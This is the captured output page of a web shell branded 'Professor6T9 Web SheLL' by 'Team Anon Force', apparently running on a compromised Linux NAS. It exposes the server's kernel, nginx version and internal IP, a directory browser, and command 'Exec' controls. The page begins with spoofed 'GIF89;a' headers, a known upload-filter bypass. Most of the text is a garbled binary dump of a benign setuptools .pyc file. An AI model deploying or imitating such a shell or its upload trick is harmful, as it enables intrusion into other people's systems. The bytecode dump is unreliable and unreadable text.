GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
setuptools
/
command
/
__pycache__
[ HOME ]
Exec
Submit
bdist_egg.cpython-38.pyc
U �}�h�@ � @ s d Z ddlmZmZ ddlmZ ddlmZ ddlZddl Z ddl Z ddlZddlZddl mZ ddlmZ dd lmZ dd lmZmZ dd� Zd d� Zdd� Zdd� ZG dd� de�Ze�d�� �Zdd� Zdd� Z dd� Z!ddd�Z"dd � Z#d!d"� Z$d#d$� Z%d%d&d'd(gZ&d.d,d-�Z'dS )/z6setuptools.command.bdist_egg Build .egg distributions� )�remove_tree�mkpath)�log)�CodeTypeN)�Library)�Command� )�ensure_directory)�get_path�get_python_versionc C s t d�S )N�purelib)r � r r �C/tmp/pip-target-k_nuic9h/lib/python/setuptools/command/bdist_egg.py�_get_purelib s r c C s2 d| krt j�| �d } | �d�r.| d d� } | S )N�.r �modulei����)�os�path�splitext�endswith)�filenamer r r �strip_module s r c c s6 t �| �D ]&\}}}|�� |�� |||fV q dS )zbDo os.walk in a reproducible way, independent of indeterministic filesystem readdir order N)r �walk�sort)�dir�base�dirs�filesr r r �sorted_walk! s r c C s: t �d��� }t|ddd��}|�|| � W 5 Q R X d S )Na� def __bootstrap__(): global __bootstrap__, __loader__, __file__ import sys, pkg_resources, importlib.util __file__ = pkg_resources.resource_filename(__name__, %r) __loader__ = None; del __bootstrap__, __loader__ spec = importlib.util.spec_from_file_location(__name__,__file__) mod = importlib.util.module_from_spec(spec) spec.loader.exec_module(mod) __bootstrap__() �w�utf-8��encoding)�textwrap�dedent�lstrip�open�write)�resource�pyfileZ_stub_template�fr r r � write_stub+ s � r+ c @ s� e Zd ZdZddddddgZdd d gZdd� Zd d� Zdd� Zdd� Z dd� Z dd� Zdd� Zdd� Z dd� Zdd� Zdd � Zd!S )"� bdist_eggzcreate an "egg" distribution)z bdist-dir=�bz1temporary directory for creating the distribution)z plat-name=�pzdplatform name to embed in generated filenames (by default uses `pkg_resources.get_build_platform()`))�exclude-source-filesNz+remove all .py files from the generated egg)� keep-temp�kzPkeep the pseudo-installation tree around after creating the distribution archive)z dist-dir=�dz-directory to put final built distributions in)� skip-buildNz2skip rebuilding everything (for testing/debugging)r0 r3 r/ c C s. d | _ d | _d| _d | _d| _d | _d | _d S )NF)� bdist_dir� plat_name� keep_temp�dist_dir� skip_build� egg_output�exclude_source_files��selfr r r �initialize_optionsU s zbdist_egg.initialize_optionsc C s� | � d� }| _|j| _| jd kr>| � d�j}tj�|d�| _| jd kr\ddl m } |� | _| �dd� | jd kr�|j t� | j�� o�| jd�}tj�| j|d �| _d S ) N�egg_info�bdist�eggr )�get_build_platform)r7 r7 )� py_version�platformz.egg)�get_finalized_command�ei_cmdr>